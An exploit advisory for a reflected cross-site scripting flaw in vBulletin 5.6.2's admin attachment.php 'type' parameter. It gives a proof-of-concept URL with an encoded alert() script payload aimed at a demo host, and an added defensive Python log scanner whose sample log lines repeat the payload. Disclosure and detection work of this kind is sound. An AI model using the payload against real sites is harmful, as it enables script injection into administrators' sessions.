vBulletin version 5.6.2 suffers from a cross-site scripting vulnerability.
# Exploit Title: vBulletin 5.6.2 Cross Site Scripting
# Date: 12.08.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://www.vbulletin.com/en/features/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Blog : https://pentest-vincent.blogspot.com/
# PoC: https://pentest-vincent.blogspot.com/2020/08/cross-site-scripting-in-vbulletin-ver.html
So..
We have a cross-site scripting vulnerability in vBulletin 5.6.2.
PoC:
I used the demo admin panel for testing.
Our vuln link:
https://6696f1715188-041313.demo.vbulletin.net/admincp/attachment.php&do=rebuild&type=[our xss is here]
Full link with code:
https://6696f1715188-041313.demo.vbulletin.net/admincp/attachment.php&do=rebuild&type=%22%22%3E%3Cscript%3Ealert(%22cross%20site%20scripting%20%22)%3C/script%3E
Picture:
https://imgur.com/a/OicFHyA
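For defenders, a log check for requests like the one above, written as an added example that is not part of the original advisory or of vBulletin. The log lines are constructed, and the identifier-only rule for `type` is an assumption to adjust per install.

```python
import re
from urllib.parse import unquote

TARGET = "/admincp/attachment.php"
# Assumption: legitimate `type` values are short identifiers.
SAFE_TYPE = re.compile(r"[A-Za-z0-9_-]{1,32}")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def extract_params(request_target):
    """Split a request target into (path, params).

    The link in the advisory joins the parameters to the script name with
    '&' and no '?', so a parser that reads only the query string finds no
    parameters at all. Splitting on either separator covers both forms.
    """
    parts = re.split(r"[?&]", request_target)
    params = {}
    for pair in parts[1:]:
        key, _, value = pair.partition("=")
        # Decode twice so double-encoded markup is compared in clear form.
        params[unquote(key)] = unquote(unquote(value))
    return parts[0], params

def suspicious(line):
    """True when a log line hits TARGET with a `type` value outside SAFE_TYPE."""
    m = REQUEST.search(line)
    if not m:
        return False
    path, params = extract_params(m.group(1))
    if not path.endswith(TARGET) or "type" not in params:
        return False
    return SAFE_TYPE.fullmatch(params["type"]) is None

# Constructed access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Aug/2020:10:00:00 +0000] "GET /admincp/attachment.php?do=rebuild&type=example HTTP/1.1" 200 512',
    '203.0.113.9 - - [12/Aug/2020:10:01:00 +0000] "GET /admincp/attachment.php&do=rebuild&type=%22%22%3E%3Cscript%3Ealert(%22cross%20site%20scripting%20%22)%3C/script%3E HTTP/1.1" 200 812',
    '203.0.113.9 - - [12/Aug/2020:10:02:00 +0000] "GET /admincp/attachment.php?do=rebuild&type=%253Cscript%253E HTTP/1.1" 200 640',
    '203.0.113.7 - - [12/Aug/2020:10:03:00 +0000] "GET /index.php?type=%3Cb%3E HTTP/1.1" 200 300',
]

def flagged(lines):
    return [line for line in lines if suspicious(line)]

if __name__ == "__main__":
    for hit in flagged(SAMPLE_LOG):
        print(hit)
```

The same identifier-only rule, enforced server-side together with HTML-encoding of the value wherever it is echoed, is what stops the markup from reaching the page.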